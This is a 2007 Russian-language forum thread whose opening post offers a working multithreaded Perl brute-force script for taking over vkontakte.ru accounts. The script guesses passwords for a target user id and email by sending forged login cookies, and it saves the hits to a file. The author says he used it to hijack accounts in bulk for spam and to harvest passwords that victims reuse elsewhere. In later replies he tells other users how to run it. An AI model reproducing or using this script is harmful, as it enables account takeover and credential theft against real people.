ICQ - форум. Всё про ICQ.  

Вернуться   ICQ - форум. Всё про ICQ. > Мастерская > Программирование > Web-программирование

Web-программирование PHP, Perl, JavaScript, HTML, CGI, ASP, MySQL, etc.

 
 
Опции темы Оценить тему
Старый 17.08.2007, 20:48   #1
Участник
 
Аватар для C!klodoL
 
Регистрация: 04.06.2007
Сообщений: 27

Репутация: 22
По умолчанию vkontakte.ru брут - финал

И так сегодня павел дуров закрыл багу в печенюшках которая позволяла логинится по кукам не зная мыла и следовательно перебирать пароли, но зная мыло всё же можно брутить юзера:fuck: и так мой финальный брутфорс для контакта, сделал многопоточность, у меня на 110кбит при 4 потоках перебирало около 50 000 паролей в час :)
Код:
#!/usr/bin/perl

use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;

######################################
# C!klodoL
# vkontakte.ru bruteforce with multi-threads :)
######################################
$dic = 'passl.txt';		#словарь паролей
$id = 111111;		#id цели
$mail = 'mail%40mail.com';	#мыло, вместо @ вписать %40
$threads = 4;		#количество потоков
######################################

open (pass, "<$dic");

Next:
@pass = pass();

for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}
for(@trl) { $_->join; }

sub Brut
{

while (@pass){

$pass = shift @pass;

$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);
print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n".
	"Host: vkontakte.ru\r\n".
            "Accept: */*\r\n".
            "Content-Type: application/x-www-form-urlencoded\r\n".
            "User-Agent: Mozillo\r\n".
            "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".
            "Connection: close\r\n\r\n";
$answ = <$sock>;
close $sock;
print "$pass  $answ";
if ($answ =~ /302/){
open (good, '>>good.txt');
print good "$id:$pass:$md5\n";
print "$id:$pass:$md5\n";
close good;
exit;}
}

}

goto Next;

sub pass
{
	my (@mas);
	while (<pass>){
	push @mas, $_;
	last if (@mas == 400);
	}
	chomp @mas;
	return @mas;
}

Последний раз редактировалось C!klodoL; 26.08.2007 в 09:10.
C!klodoL вне форума  
Старый 18.08.2007, 00:14   #2
Участник
 
Регистрация: 27.09.2006
Сообщений: 1,045

ICQ: 272768

Репутация: 2856
Отправить сообщение для .fry с помощью Skype™ Bimoid
По умолчанию

.....
__________________
Хочешь знать как работает ICQ? Читай документацию по протоколу в OSCAR.

Последний раз редактировалось .fry; 04.11.2008 в 22:58.
.fry вне форума  
Старый 18.08.2007, 02:11   #3
Участник
 
Аватар для Fly
 
Регистрация: 27.12.2002
Сообщений: 34

ICQ: 355325

Репутация: 10
По умолчанию

Я наверно чот пропустил, но зачем брутить вконтакте.ру?
ЗЫ: если только как пример...
__________________
Перат.

Последний раз редактировалось Fly; 18.08.2007 в 02:34.
Fly вне форума  
Старый 18.08.2007, 02:17   #4
Участник
 
Аватар для #define TRUE FALSE
 
Регистрация: 06.04.2005
Сообщений: 126

ICQ: 202053

Репутация: 225
По умолчанию

Цитата:
Сообщение от Fly Посмотреть сообщение
Я наверно чот пропустил
угу...тема
Цитата:
Web програмирование PHP, Perl, JavaScript, HTML, CGI, ASP, MySQL, etc.
__________________
Сообщение заговорено!
Модерирование оного сообщения приведет к
половому бессилию и неизлечимым венерическим заболеваниям
!

#define TRUE FALSE вне форума  
Старый 18.08.2007, 02:43   #5
Участник
 
Аватар для C!klodoL
 
Регистрация: 04.06.2007
Сообщений: 27

Репутация: 22
По умолчанию

Цитата:
но зачем брутить вконтакте.ру?
пока паша не исправил багу в куках я брутил акки по диапазону для спама, ну а так контакт можно брутить для получения пароля в надежде что жертва его еще где то использует, например у ылитного пятизнака 8)

Последний раз редактировалось C!klodoL; 18.08.2007 в 02:45.
C!klodoL вне форума  
Старый 19.08.2007, 19:25   #6
Модератор
 
Регистрация: 14.01.2007
Сообщений: 555

Репутация: 1
По умолчанию

Цитата:
Сообщение от C!klodoL Посмотреть сообщение
пока паша не исправил багу в куках я брутил акки по диапазону для спама, ну а так контакт можно брутить для получения пароля в надежде что жертва его еще где то использует, например у ылитного пятизнака 8)
Пипец, мы все под колпаком...:blink:
alkos вне форума  
Старый 02.11.2007, 03:45   #7
Участник
 
Регистрация: 02.11.2007
Сообщений: 1

Репутация: -2
По умолчанию

мне мне надо брутить контакт!
только объясните как юзать тот код который приведен
пожалуйста!

Добавлено через 17 минут
и еще - у контакта есть какая то логика при раздаче паролей?
если представить что человек не менял его на свой - но какой лучше словарь использовать??
спасибо

Добавлено через 18 минут
и еще - у контакта есть какая то логика при раздаче паролей?
если представить что человек не менял его на свой - но какой лучше словарь использовать??
спасибо

Добавлено через 19 минут
хотел написать ТО какой лучше словарь использовать

Последний раз редактировалось marco_tullio; 02.11.2007 в 04:05. Причина: Добавлено сообщение
marco_tullio вне форума  
Старый 03.11.2007, 17:55   #8
Участник
 
Аватар для belchak
 
Регистрация: 29.09.2006
Сообщений: 17

Репутация: 2
По умолчанию

А он у меня чё-то не пашет говорит следующее:
Цитата:
Can't locate threads.pm in @INC (@INC contains: C:/Perl/lib C:/Perl/site/lib .)
at kontakt.pl line 5.
BEGIN failed--compilation aborted at kontakt.pl line 5.
belchak вне форума  
Старый 05.11.2007, 21:54   #9
Участник
 
Аватар для C!klodoL
 
Регистрация: 04.06.2007
Сообщений: 27

Репутация: 22
По умолчанию

marco_tullio
качаем Perl c activestate.com, ставим, сохраняем код как brut.pl не забыв указать необходимые параметры в скрипте
belchak
у тебя перл старье, без поддержки потоков, скачай новый

а вообще по моему там теперь ввели бан за частые запросы
C!klodoL вне форума  
Старый 17.11.2007, 21:00   #10
Участник
 
Регистрация: 17.11.2007
Сообщений: 3

Репутация: 1
По умолчанию

вероянто, это тот самы случай, когда кривые руки голове покоя не дают, но, тем не менее, отважусь задать вопрос) значит, вписываю мыло, вписываю id, запускаю скрипт. В принципе, ошибок он не мне выдает, даже запускается. Решительно непонятно только делает ли он что-нибудь. Сетевой монитор с его стороны активности не замечает, хотя траффик, по идее, должен быть приличный. Мож я исходники плохо читал?..=\
manny вне форума  
Старый 17.11.2007, 22:30   #11
Участник
 
Регистрация: 15.01.2007
Сообщений: 585

Репутация: 1528
По умолчанию

Скиньте первый пост вочтапу в личку ;)
vovan-f вне форума  
Старый 17.11.2007, 22:38   #12
Почемучка
 
Аватар для vo4tap
 
Регистрация: 04.01.2006
Сообщений: 1,380

ICQ: 200665

Репутация: 4264
Отправить сообщение для vo4tap с помощью Skype™ Jabber Bimoid Twitter
По умолчанию

что ты этим хотел сказать?
просто пооффтопить или может съязвить?
vo4tap вне форума  
Старый 17.11.2007, 22:40   #13
Участник
 
Регистрация: 17.11.2007
Сообщений: 3

Репутация: 1
По умолчанию

мужчины, я-таки исчо раз попрошу оценить кривизну моих рук))
manny вне форума  
Старый 20.11.2007, 15:52   #14
Участник
 
Аватар для b3n3d1kt
 
Регистрация: 23.12.2006
Сообщений: 160

ICQ: 925974

Репутация: 10
По умолчанию

Неблагородное это дело брутить такой сайт...
Павел Дуров для людей старается...даже рекламу на сайт не вешает...в общем ***** Вы!
Извините уж, конечно, но это моё мнение!
__________________
Яndex-ищет и...находит!!!
b3n3d1kt вне форума  
Старый 25.11.2007, 19:54   #15
Участник
 
Регистрация: 17.11.2007
Сообщений: 3

Репутация: 1
По умолчанию

у меня вопрос п теме, но из серии дурацких. почему нельзя перед goto next написать $md5->finish(); шоб оперативка не набивалась значениями дескриптора?
manny вне форума  
Старый 26.11.2007, 05:26   #16
Участник
 
Аватар для C!klodoL
 
Регистрация: 04.06.2007
Сообщений: 27

Репутация: 22
По умолчанию

manny может фаерволл какой там блочит, может еще что, я то не телепат, а вообще ты какой то подозрительный =/ то скрипт запустить не можешь, а вдруг про дескрипторы знаешь

>Павел Дуров для людей старается
ога, и миралабис для людей старается, давайте его не будем брутить, и гилл бейц стараеццо, давайте не будет п.. винду. а вообще я хз для кого павел старается, но то что фото и видео там сохраняются после их удаления это факт 8) Бесплатный сыр только в мышеловке, помним? 8)
C!klodoL вне форума  
Старый 13.01.2008, 19:04   #17
Участник заблокирован
 
Регистрация: 11.01.2008
Сообщений: 6

Репутация: 0
По умолчанию

_http://forum.asechka.ru/showthread.php?t=101924
После этой тему вы тоже скажете, что брутить акки тупость? =))
6yrara вне форума  
Старый 14.01.2008, 18:24   #18
Участник
 
Аватар для [Elite] Crash
 
Регистрация: 27.09.2004
Сообщений: 40

ICQ: 516311

Репутация: 3
По умолчанию

Цитата:
Сообщение от C!klodoL Посмотреть сообщение
marco_tullio
............
а вообще по моему там теперь ввели бан за частые запросы
точно?
__________________
[Elite] Crash вне форума  
Старый 14.01.2008, 22:23   #19
Участник
 
Регистрация: 16.11.2006
Сообщений: 19

ICQ: 678265

Репутация: 9
По умолчанию

лучшеб автозаполнятель инфы написали ... imho более полезен и актуален.
De$p вне форума  
 


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Выкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Часовой пояс GMT +3, время: 17:36.


Перевод: zCarot
Форум Асечников © Asechka.RU

Новости Сочи